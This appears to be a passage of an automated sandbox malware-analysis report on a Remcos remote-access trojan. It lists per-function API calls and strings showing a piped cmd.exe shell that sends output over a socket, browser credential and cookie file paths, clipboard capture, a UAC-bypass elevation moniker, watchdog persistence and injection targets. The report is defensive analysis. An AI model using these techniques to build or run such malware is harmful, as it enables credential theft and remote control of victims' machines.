                    • Instruction ID: 75e26f7f6c3f3dbd7fc3c9379f58c72dc3a715cd35b24c1fb8b7d51949cc7e38
                    • Opcode Fuzzy Hash: 4e58a0086eefa5a7d711f599d6b504f8132a4b145ccff10764beb7e3a44898d0
                    • Instruction Fuzzy Hash: FE427F71A043016BC604FB76C95B9AE77A5AF91348F40093FF542671E2EE7C9A08879B
                    Function 0040569A Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 278pipesleepfileCOMMON
                    Download Yara Rule
                    APIs
                    • __Init_thread_footer.LIBCMT ref: 004056E6
                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                    • __Init_thread_footer.LIBCMT ref: 00405723
                    • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
                    • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                    • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                    • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                    • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                      • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                    • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90), ref: 004059E4
                    • Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
                    • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                    • CloseHandle.KERNEL32 ref: 00405A23
                    • CloseHandle.KERNEL32 ref: 00405A2B
                    • CloseHandle.KERNEL32 ref: 00405A3D
                    • CloseHandle.KERNEL32 ref: 00405A45
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                    • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                    • API String ID: 2994406822-18413064
                    • Opcode ID: 185a173cb34db82ff4a93fb45cf4562bf1f19873a7db0a51e34bec58793cf561
                    • Instruction ID: 70e6a120cd26ef4d63fea04585a98dfb86eec3f3f3d93349c630b188a9e88b71
                    • Opcode Fuzzy Hash: 185a173cb34db82ff4a93fb45cf4562bf1f19873a7db0a51e34bec58793cf561
                    • Instruction Fuzzy Hash: 8891E471604604AFD711FB36ED42A6F369AEB84308F01443FF989A62E2DB7D9C448B5D
                    Function 004120F7 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 238threadCOMMON
                    Download Yara Rule
                    APIs
                    • GetCurrentProcessId.KERNEL32 ref: 00412106
                      • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                      • Part of subcall function 00413877: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004), ref: 004138A0
                      • Part of subcall function 00413877: RegCloseKey.KERNEL32(004660A4), ref: 004138AB
                    • OpenMutexA.KERNEL32 ref: 00412146
                    • CloseHandle.KERNEL32(00000000), ref: 00412155
                    • CreateThread.KERNEL32(00000000,00000000,004127EE,00000000,00000000,00000000), ref: 004121AB
                    • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041241A
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                    • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                    • API String ID: 3018269243-13974260
                    • Opcode ID: 2bc8fd5c154d9cc769ef6804c594b66dd22dad559f3b9a4926214948642efd23
                    • Instruction ID: 8205490d34a3093c97c97cf0412c87f535f0d81ed9353c04b1464aab831027f3
                    • Opcode Fuzzy Hash: 2bc8fd5c154d9cc769ef6804c594b66dd22dad559f3b9a4926214948642efd23
                    • Instruction Fuzzy Hash: 2671813160430167C614FB72CD579AE73A4AF90308F50057FB546A61E2FFBC9949C69E
                    Function 0040BB30 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON
                    Download Yara Rule
                    APIs
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBAF
                    • FindClose.KERNEL32(00000000), ref: 0040BBC9
                    • FindNextFileA.KERNEL32(00000000,?), ref: 0040BCEC
                    • FindClose.KERNEL32(00000000), ref: 0040BD12
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$CloseFile$FirstNext
                    • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                    • API String ID: 1164774033-3681987949
                    • Opcode ID: a7abc2cbee64d590697779d9a46801e96057498aa45ff5fe343c94ad28998e44
                    • Instruction ID: 0369a90be492857ee26322cec2c2e6bc6ddf3692cf68474a737f8ca2a3b0d98c
                    • Opcode Fuzzy Hash: a7abc2cbee64d590697779d9a46801e96057498aa45ff5fe343c94ad28998e44
                    • Instruction Fuzzy Hash: 13516E3190421A9ADB14F7B2DC56DEEB739AF11304F10057FF406721E2EF785A89CA89
                    Function 004168C1 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80clipboardmemoryCOMMON
                    Download Yara Rule
                    APIs
                    • OpenClipboard.USER32 ref: 004168C2
                    • EmptyClipboard.USER32 ref: 004168D0
                    • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004168F0
                    • GlobalLock.KERNEL32 ref: 004168F9
                    • GlobalUnlock.KERNEL32(00000000), ref: 0041692F
                    • SetClipboardData.USER32 ref: 00416938
                    • CloseClipboard.USER32 ref: 00416955
                    • OpenClipboard.USER32 ref: 0041695C
                    • GetClipboardData.USER32 ref: 0041696C
                    • GlobalLock.KERNEL32 ref: 00416975
                    • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                    • CloseClipboard.USER32 ref: 00416984
                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                    • String ID: !D@
                    • API String ID: 3520204547-604454484
                    • Opcode ID: 6c018320e5b0d2cabe6153e6df3be29feb4b7020e0ff09a9ecc452abf36931f7
                    • Instruction ID: 9e7c9e91df33a813dd3aefbd505e3631e00017b2d00f6ad0929271c723fa7fba
                    • Opcode Fuzzy Hash: 6c018320e5b0d2cabe6153e6df3be29feb4b7020e0ff09a9ecc452abf36931f7
                    • Instruction Fuzzy Hash: 9F212171604301DBD714BB71DC5DABE36A9AF88746F40043EF946921E2EF3C8D45C66A
                    Function 0040BD37 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON
                    Download Yara Rule
                    APIs
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDAF
                    • FindClose.KERNEL32(00000000), ref: 0040BDC9
                    • FindNextFileA.KERNEL32(00000000,?), ref: 0040BE89
                    • FindClose.KERNEL32(00000000), ref: 0040BEAF
                    • FindClose.KERNEL32(00000000), ref: 0040BED0
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$Close$File$FirstNext
                    • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                    • API String ID: 3527384056-432212279
                    • Opcode ID: 48f1059577fb6fb3e12f81dcccae54fa1aae2825fed048d23a83c2489a6cdfe4
                    • Instruction ID: daa8673b40617291cefb90f55d029d970aaced9502edc59260dc825ad40fac9f
                    • Opcode Fuzzy Hash: 48f1059577fb6fb3e12f81dcccae54fa1aae2825fed048d23a83c2489a6cdfe4
                    • Instruction Fuzzy Hash: 38417D3190021AAADB04F7A6DC5A9EEB769DF11704F50017FF506B20D2EF385A46CA9E
                    Function 0040F474 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 210processCOMMON
                    Download Yara Rule
                    APIs
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F48E
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4B9
                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F4D5
                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F554
                    • CloseHandle.KERNEL32(00000000), ref: 0040F563
                      • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                      • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                    • CloseHandle.KERNEL32(00000000), ref: 0040F66E
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                    • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                    • API String ID: 3756808967-1743721670
                    • Opcode ID: 8520e54c90e73ae769b9472ab5acef4e7d13580ea560d925ff866fcf30e94af2
                    • Instruction ID: b3f00c97eb68dcc530bbf6735eb7028ff3362e05d7342ed3a56d945b0ce45bff
                    • Opcode Fuzzy Hash: 8520e54c90e73ae769b9472ab5acef4e7d13580ea560d925ff866fcf30e94af2
                    • Instruction Fuzzy Hash: F6715E705083419BC724FB21D8959AEB7A5AF90348F50083FF586631E3EF78994ECB5A
                    Function 00419627 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 206COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 0$1$2$3$4$5$6$7$VG
                    • API String ID: 0-1861860590
                    • Opcode ID: 6e6c7a448708c07855854a0ebdca304f9e0347beed71fdd78d4df1a7a8a0f9ff
                    • Instruction ID: 08acf1e0be570df0aadc768861284cd9b307e7e5fc43d41925289fb9f64992c1
                    • Opcode Fuzzy Hash: 6e6c7a448708c07855854a0ebdca304f9e0347beed71fdd78d4df1a7a8a0f9ff
                    • Instruction Fuzzy Hash: A771B2709183019FD304EF21D862BAB7B94DF95310F10492FF5A26B2D1DF78AA49CB96
                    Function 004074FD Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 56COMMON
                    Download Yara Rule
                    APIs
                    • _wcslen.LIBCMT ref: 00407521
                    • CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Object_wcslen
                    • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                    • API String ID: 240030777-3166923314
                    • Opcode ID: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
                    • Instruction ID: 36c1a35fc662e139fbe0c3856e6c09b73c1590006896ac343f6f9e6a2f87480d
                    • Opcode Fuzzy Hash: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
                    • Instruction Fuzzy Hash: 1D115172D04218BAD710E6959C45ADEB7A89B08714F15007BF904B2282E77CAA4486BA
                    Function 0041A748 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                    Download Yara Rule
                    APIs
                    • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A75E
                    • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A7AD
                    • GetLastError.KERNEL32 ref: 0041A7BB
                    • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A7F3
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: EnumServicesStatus$ErrorLastManagerOpen
                    • String ID:
                    • API String ID: 3587775597-0
                    • Opcode ID: a92e5e22f525c5d855de5902c8743aa5aa96fd2eb9e2bef805906780dfe370d3
                    • Instruction ID: 0905bbee584710e72bd43cf86ffd47af08151029a50ddcda7611e9b1cb6672f7
                    • Opcode Fuzzy Hash: a92e5e22f525c5d855de5902c8743aa5aa96fd2eb9e2bef805906780dfe370d3
                    • Instruction Fuzzy Hash: A1815F71104305ABC304EB61D885DAFB7A8FF94749F50092FF585521A2EF78EE48CB9A
                    Function 00452610 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 188COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                      • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                    • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045271C
                    • IsValidCodePage.KERNEL32(00000000), ref: 00452777
                    • IsValidLocale.KERNEL32(?,00000001), ref: 00452786
                    • GetLocaleInfoW.KERNEL32(?,00001001,lJD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004527CE
                    • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 004527ED
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                    • String ID: lJD$lJD$lJD
                    • API String ID: 745075371-479184356
                    • Opcode ID: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                    • Instruction ID: 5597d49bf91f8be5c1e88387600e3254545b136a20640e737b6730ed74bf2304
                    • Opcode Fuzzy Hash: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                    • Instruction Fuzzy Hash: 87518371900205ABDF10DFA5CD41ABF77B8AF19702F14047BFD04E7292E7B899488B69
                    Function 0040C34D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON
                    Download Yara Rule
                    APIs
                    • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C39B
                    • FindNextFileW.KERNEL32(00000000,?), ref: 0040C46E
                    • FindClose.KERNEL32(00000000), ref: 0040C47D
                    • FindClose.KERNEL32(00000000), ref: 0040C4A8
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$CloseFile$FirstNext
                    • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                    • API String ID: 1164774033-405221262
                    • Opcode ID: e5779cf76b5a77b8801820eb787e52b5a733e9d63f63ab9a2c996bd2ffd17758
                    • Instruction ID: 975c513e22faa42ee1994afe11ceef4a5d9ff9fa3a88a4f7cb3cdca8b35e8719
                    • Opcode Fuzzy Hash: e5779cf76b5a77b8801820eb787e52b5a733e9d63f63ab9a2c996bd2ffd17758
                    • Instruction Fuzzy Hash: 4131513150021AA6CB14E7A1DC9ADFE7778AF10718F10017FB105B20D2EF789A49CA4D
                    Function 0041C291 Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON
                    Download Yara Rule
                    APIs
                    • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
                    • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C38E
                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C39B
                      • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371
                    • GetLastError.KERNEL32(?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3BC
                    • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
                    • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9
                    • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3E2
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                    • String ID:
                    • API String ID: 2341273852-0
                    • Opcode ID: 7754893f2187ba533a154fe4103e102bcae7ebd53560a2043af222d2c338aa0a
                    • Instruction ID: c19bc5cae20e4253aafd1d57f534f4f4794eeb6ee7264df4fdb3445c687e6cd6
                    • Opcode Fuzzy Hash: 7754893f2187ba533a154fe4103e102bcae7ebd53560a2043af222d2c338aa0a
                    • Instruction Fuzzy Hash: 1331827294031CAADB24E7A1DC88EDB736CAF04305F4405FBF955D2152EB39DAC88B68
                    Function 00419AF5 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 245fileCOMMON
                    Download Yara Rule
                    APIs
                    • FindFirstFileW.KERNEL32(00000000,?), ref: 00419D4B
                    • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419E17
                      • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$Find$CreateFirstNext
                    • String ID: 8SG$PXG$PXG$NG$PG
                    • API String ID: 341183262-3812160132
                    • Opcode ID: b6fdd12ea4283b508e25f04ac6086fd651a88d51969d46a0526c61d0c238dc80
                    • Instruction ID: 96038134cf9b6260143958ba34f432c8b7c7433700823f8ab46a3e18139dd1a2
                    • Opcode Fuzzy Hash: b6fdd12ea4283b508e25f04ac6086fd651a88d51969d46a0526c61d0c238dc80
                    • Instruction Fuzzy Hash: D48152315083415AC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                    Function 0040A3E0 Relevance: 12.1, APIs: 8, Instructions: 112keyboardthreadCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                    • String ID:
                    • API String ID: 1888522110-0
                    • Opcode ID: cc4c28d987af9ed77b60558391ff2640f7f7fc81cb6ffa0e765e100d0ff3e66e
                    • Instruction ID: 5ff565fa5b8df07833abad56ec5ecbabe923af01fc99f1944a330f9e709d98a3
                    • Opcode Fuzzy Hash: cc4c28d987af9ed77b60558391ff2640f7f7fc81cb6ffa0e765e100d0ff3e66e
                    • Instruction Fuzzy Hash: AE316D72504308FFD710DF94DC45F9BB7ECAB88705F01083AB645D61A0E7B5E9488BA6
                    Function 00413FCA Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 382registrylibraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • RegCreateKeyExW.ADVAPI32(00000000), ref: 0041409D
                    • RegCloseKey.ADVAPI32(?), ref: 004140A9
                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                    • LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 0041426A
                    • GetProcAddress.KERNEL32(00000000), ref: 00414271
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressCloseCreateLibraryLoadProcsend
                    • String ID: SHDeleteKeyW$Shlwapi.dll
                    • API String ID: 2127411465-314212984
                    • Opcode ID: e30b5f6ce4cbdd366537afe2320d9bfcb0a6543311229dd69bf6235dce3d7422
                    • Instruction ID: ad322413622673165c78a8c4b5f48079e939d646f467ca97d3bec1feacf55119
                    • Opcode Fuzzy Hash: e30b5f6ce4cbdd366537afe2320d9bfcb0a6543311229dd69bf6235dce3d7422
                    • Instruction Fuzzy Hash: F9B1F971A0430066CA14FB76DC5B9AF36A86FD1748F40053FF942771E2EE7C9A4886DA
                    Function 00449190 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _free.LIBCMT ref: 00449212
                    • _free.LIBCMT ref: 00449236
                    • _free.LIBCMT ref: 004493BD
                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                    • _free.LIBCMT ref: 00449589
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ByteCharMultiWide$InformationTimeZone
                    • String ID:
                    • API String ID: 314583886-0
                    • Opcode ID: 9cd240c025cd7d498dafe0f0be125a30ff36c68caa35d7d10d4c95a756b7505e
                    • Instruction ID: 779aab753f07af14b01adf3fce5c8211df4e7f9331a35af1166ddbde82723190
                    • Opcode Fuzzy Hash: 9cd240c025cd7d498dafe0f0be125a30ff36c68caa35d7d10d4c95a756b7505e
                    • Instruction Fuzzy Hash: CAC15771900205ABFB24DF69CC41AAFBBA8EF46314F1405AFE89497381E7788E42D758
                    Function 004167B4 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 97libraryloadershutdownCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00417952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                      • Part of subcall function 00417952: OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                      • Part of subcall function 00417952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                      • Part of subcall function 00417952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                      • Part of subcall function 00417952: GetLastError.KERNEL32 ref: 0041799D
                    • ExitWindowsEx.USER32(00000000,00000001), ref: 00416856
                    • LoadLibraryA.KERNEL32(PowrProf.dll), ref: 0041686B
                    • GetProcAddress.KERNEL32(00000000), ref: 00416872
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                    • String ID: !D@$PowrProf.dll$SetSuspendState
                    • API String ID: 1589313981-2876530381
                    • Opcode ID: cf382c4b4b58b3ccdbeb602cd597e3aae52b34eb44ac0b5ef7fae28ca1f23560
                    • Instruction ID: 15d3ae9bc4d358b9de40311b9e813ebd0b85961e95f80c383f5c7d57e5fc9640
                    • Opcode Fuzzy Hash: cf382c4b4b58b3ccdbeb602cd597e3aae52b34eb44ac0b5ef7fae28ca1f23560
                    • Instruction Fuzzy Hash: 6E21617060430256CB14FBB68856AAE63599F41788F41487FB442A72D3EF3CD845CBAE
                    Function 0045243C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 86COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetLocaleInfoW.KERNEL32(00000000,2000000B,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524D5
                    • GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524FE
                    • GetACP.KERNEL32(?,?,0045275B,?,00000000), ref: 00452513
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: InfoLocale
                    • String ID: ACP$OCP$['E
                    • API String ID: 2299586839-2532616801
                    • Opcode ID: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                    • Instruction ID: 65f7b5195a5790e2d5819d7d4b0c6b76a8aa59636dcad79128a037cfc813d78c
                    • Opcode Fuzzy Hash: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                    • Instruction Fuzzy Hash: FD21F432600104A7DB348F54CF00AA773A6EB47B1AB168567EC09D7302F7BADD48C398
                    Function 0040BA12 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                    Download Yara Rule
                    APIs
                    • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA4E
                    • GetLastError.KERNEL32 ref: 0040BA58
                    Strings
                    • [Chrome StoredLogins not found], xrefs: 0040BA72
                    • UserProfile, xrefs: 0040BA1E
                    • [Chrome StoredLogins found, cleared!], xrefs: 0040BA7E
                    • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA19
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: DeleteErrorFileLast
